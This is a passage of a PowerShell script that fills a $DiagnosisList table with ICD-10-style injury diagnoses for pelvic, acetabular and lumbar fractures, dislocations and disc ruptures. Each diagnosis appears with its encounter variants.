subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right acetabulum","Displaced dome fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right acetabulum","Displaced dome fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right acetabulum","Displaced dome fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left acetabulum","Displaced dome fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left acetabulum","Displaced dome fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left acetabulum","Displaced dome fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left acetabulum","Displaced dome fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left acetabulum","Displaced dome fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left acetabulum","Displaced dome fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified acetabulum","Displaced dome fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified acetabulum","Displaced dome fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified acetabulum","Displaced dome fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified acetabulum","Displaced dome fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified acetabulum","Displaced dome fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified acetabulum","Displaced dome fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right acetabulum","Nondisplaced dome fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right acetabulum","Nondisplaced dome fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right acetabulum","Nondisplaced dome fracture of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right acetabulum","Nondisplaced dome fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right acetabulum","Nondisplaced dome fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right acetabulum","Nondisplaced dome fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left acetabulum","Nondisplaced dome fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left acetabulum","Nondisplaced dome fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left acetabulum","Nondisplaced dome fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left acetabulum","Nondisplaced dome fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left acetabulum","Nondisplaced dome fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left acetabulum","Nondisplaced dome fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified acetabulum","Nondisplaced dome fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified acetabulum","Nondisplaced dome fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified acetabulum","Nondisplaced dome fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified acetabulum","Nondisplaced dome fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified acetabulum","Nondisplaced dome fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified acetabulum","Nondisplaced dome fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right acetabulum","Other specified fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right acetabulum","Other specified fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right acetabulum","Other specified fracture of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right acetabulum","Other specified fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right acetabulum","Other specified fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right acetabulum","Other specified fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left acetabulum","Other specified fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left acetabulum","Other specified fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left acetabulum","Other specified fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left acetabulum","Other specified fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left acetabulum","Other specified fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left acetabulum","Other specified fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified acetabulum","Other specified fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified acetabulum","Other specified fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified acetabulum","Other specified fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified acetabulum","Other specified fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified acetabulum","Other specified fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified acetabulum","Other specified fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right pubis","Unspecified fracture of right pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right pubis","Unspecified fracture of right pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right pubis","Unspecified fracture of right pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right pubis","Unspecified fracture of right pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right pubis","Unspecified fracture of right pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right pubis","Unspecified fracture of right pubis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left pubis","Unspecified fracture of left pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left pubis","Unspecified fracture of left pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left pubis","Unspecified fracture of left pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left pubis","Unspecified fracture of left pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left pubis","Unspecified fracture of left pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left pubis","Unspecified fracture of left pubis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified pubis","Unspecified fracture of unspecified pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified pubis","Unspecified fracture of unspecified pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified pubis","Unspecified fracture of unspecified pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified pubis","Unspecified fracture of unspecified pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified pubis","Unspecified fracture of unspecified pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified pubis","Unspecified fracture of unspecified pubis, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of right pubis","Fracture of superior rim of right pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of right pubis","Fracture of superior rim of right pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of right pubis","Fracture of superior rim of right pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of right pubis","Fracture of superior rim of right pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of right pubis","Fracture of superior rim of right pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of right pubis","Fracture of superior rim of right pubis, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of left pubis","Fracture of superior rim of left pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of left pubis","Fracture of superior rim of left pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of left pubis","Fracture of superior rim of left pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of left pubis","Fracture of superior rim of left pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of left pubis","Fracture of superior rim of left pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of left pubis","Fracture of superior rim of left pubis, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of unspecified pubis","Fracture of superior rim of unspecified pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of unspecified pubis","Fracture of superior rim of unspecified pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of unspecified pubis","Fracture of superior rim of unspecified pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of unspecified pubis","Fracture of superior rim of unspecified pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of unspecified pubis","Fracture of superior rim of unspecified pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of superior rim of unspecified pubis","Fracture of superior rim of unspecified pubis, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right pubis","Other specified fracture of right pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right pubis","Other specified fracture of right pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right pubis","Other specified fracture of right pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right pubis","Other specified fracture of right pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right pubis","Other specified fracture of right pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right pubis","Other specified fracture of right pubis, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left pubis","Other specified fracture of left pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left pubis","Other specified fracture of left pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left pubis","Other specified fracture of left pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left pubis","Other specified fracture of left pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left pubis","Other specified fracture of left pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left pubis","Other specified fracture of left pubis, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified pubis","Other specified fracture of unspecified pubis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified pubis","Other specified fracture of unspecified pubis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified pubis","Other specified fracture of unspecified pubis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified pubis","Other specified fracture of unspecified pubis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified pubis","Other specified fracture of unspecified pubis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified pubis","Other specified fracture of unspecified pubis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ischium","Unspecified fracture of right ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ischium","Unspecified fracture of right ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ischium","Unspecified fracture of right ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ischium","Unspecified fracture of right ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ischium","Unspecified fracture of right ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ischium","Unspecified fracture of right ischium, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ischium","Unspecified fracture of left ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ischium","Unspecified fracture of left ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ischium","Unspecified fracture of left ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ischium","Unspecified fracture of left ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ischium","Unspecified fracture of left ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ischium","Unspecified fracture of left ischium, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ischium","Unspecified fracture of unspecified ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ischium","Unspecified fracture of unspecified ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ischium","Unspecified fracture of unspecified ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ischium","Unspecified fracture of unspecified ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ischium","Unspecified fracture of unspecified ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ischium","Unspecified fracture of unspecified ischium, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ischium","Displaced avulsion fracture of right ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ischium","Displaced avulsion fracture of right ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ischium","Displaced avulsion fracture of right ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ischium","Displaced avulsion fracture of right ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ischium","Displaced avulsion fracture of right ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ischium","Displaced avulsion fracture of right ischium, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ischium","Displaced avulsion fracture of left ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ischium","Displaced avulsion fracture of left ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ischium","Displaced avulsion fracture of left ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ischium","Displaced avulsion fracture of left ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ischium","Displaced avulsion fracture of left ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ischium","Displaced avulsion fracture of left ischium, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ischium","Displaced avulsion fracture of unspecified ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ischium","Displaced avulsion fracture of unspecified ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ischium","Displaced avulsion fracture of unspecified ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ischium","Displaced avulsion fracture of unspecified ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ischium","Displaced avulsion fracture of unspecified ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ischium","Displaced avulsion fracture of unspecified ischium, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ischium","Nondisplaced avulsion fracture of right ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ischium","Nondisplaced avulsion fracture of right ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ischium","Nondisplaced avulsion fracture of right ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ischium","Nondisplaced avulsion fracture of right ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ischium","Nondisplaced avulsion fracture of right ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ischium","Nondisplaced avulsion fracture of right ischium, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ischium","Nondisplaced avulsion fracture of left ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ischium","Nondisplaced avulsion fracture of left ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ischium","Nondisplaced avulsion fracture of left ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ischium","Nondisplaced avulsion fracture of left ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ischium","Nondisplaced avulsion fracture of left ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ischium","Nondisplaced avulsion fracture of left ischium, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ischium","Nondisplaced avulsion fracture of unspecified ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ischium","Nondisplaced avulsion fracture of unspecified ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ischium","Nondisplaced avulsion fracture of unspecified ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ischium","Nondisplaced avulsion fracture of unspecified ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ischium","Nondisplaced avulsion fracture of unspecified ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ischium","Nondisplaced avulsion fracture of unspecified ischium, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right ischium","Other specified fracture of right ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right ischium","Other specified fracture of right ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right ischium","Other specified fracture of right ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right ischium","Other specified fracture of right ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right ischium","Other specified fracture of right ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of right ischium","Other specified fracture of right ischium, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left ischium","Other specified fracture of left ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left ischium","Other specified fracture of left ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left ischium","Other specified fracture of left ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left ischium","Other specified fracture of left ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left ischium","Other specified fracture of left ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of left ischium","Other specified fracture of left ischium, sequela") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified ischium","Other specified fracture of unspecified ischium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified ischium","Other specified fracture of unspecified ischium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified ischium","Other specified fracture of unspecified ischium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified ischium","Other specified fracture of unspecified ischium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified ischium","Other specified fracture of unspecified ischium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other specified fracture of unspecified ischium","Other specified fracture of unspecified ischium, sequela") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with stable disruption of pelvic ring","Multiple fractures of pelvis with stable disruption of pelvic ring, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with stable disruption of pelvic ring","Multiple fractures of pelvis with stable disruption of pelvic ring, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with stable disruption of pelvic ring","Multiple fractures of pelvis with stable disruption of pelvic ring, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with stable disruption of pelvic ring","Multiple fractures of pelvis with stable disruption of pelvic ring, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with stable disruption of pelvic ring","Multiple fractures of pelvis with stable disruption of pelvic ring, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with stable disruption of pelvic ring","Multiple fractures of pelvis with stable disruption of pelvic ring, sequela") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with unstable disruption of pelvic ring","Multiple fractures of pelvis with unstable disruption of pelvic ring, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with unstable disruption of pelvic ring","Multiple fractures of pelvis with unstable disruption of pelvic ring, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with unstable disruption of pelvic ring","Multiple fractures of pelvis with unstable disruption of pelvic ring, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with unstable disruption of pelvic ring","Multiple fractures of pelvis with unstable disruption of pelvic ring, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with unstable disruption of pelvic ring","Multiple fractures of pelvis with unstable disruption of pelvic ring, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis with unstable disruption of pelvic ring","Multiple fractures of pelvis with unstable disruption of pelvic ring, sequela") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis without disruption of pelvic ring","Multiple fractures of pelvis without disruption of pelvic ring, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis without disruption of pelvic ring","Multiple fractures of pelvis without disruption of pelvic ring, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis without disruption of pelvic ring","Multiple fractures of pelvis without disruption of pelvic ring, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis without disruption of pelvic ring","Multiple fractures of pelvis without disruption of pelvic ring, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis without disruption of pelvic ring","Multiple fractures of pelvis without disruption of pelvic ring, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Multiple fractures of pelvis without disruption of pelvic ring","Multiple fractures of pelvis without disruption of pelvic ring, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of pelvis","Fracture of other parts of pelvis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of pelvis","Fracture of other parts of pelvis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of pelvis","Fracture of other parts of pelvis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of pelvis","Fracture of other parts of pelvis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of pelvis","Fracture of other parts of pelvis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of other parts of pelvis","Fracture of other parts of pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified parts of lumbosacral spine and pelvis","Fracture of unspecified parts of lumbosacral spine and pelvis, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified parts of lumbosacral spine and pelvis","Fracture of unspecified parts of lumbosacral spine and pelvis, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified parts of lumbosacral spine and pelvis","Fracture of unspecified parts of lumbosacral spine and pelvis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified parts of lumbosacral spine and pelvis","Fracture of unspecified parts of lumbosacral spine and pelvis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified parts of lumbosacral spine and pelvis","Fracture of unspecified parts of lumbosacral spine and pelvis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified parts of lumbosacral spine and pelvis","Fracture of unspecified parts of lumbosacral spine and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of lumbar intervertebral disc","Traumatic rupture of lumbar intervertebral disc, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of lumbar intervertebral disc","Traumatic rupture of lumbar intervertebral disc, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of lumbar intervertebral disc","Traumatic rupture of lumbar intervertebral disc, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified lumbar vertebra","Subluxation of unspecified lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified lumbar vertebra","Subluxation of unspecified lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified lumbar vertebra","Subluxation of unspecified lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified lumbar vertebra","Dislocation of unspecified lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified lumbar vertebra","Dislocation of unspecified lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified lumbar vertebra","Dislocation of unspecified lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of L1/L2 lumbar vertebra","Subluxation of L1/L2 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L1/L2 lumbar vertebra","Subluxation of L1/L2 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L1/L2 lumbar 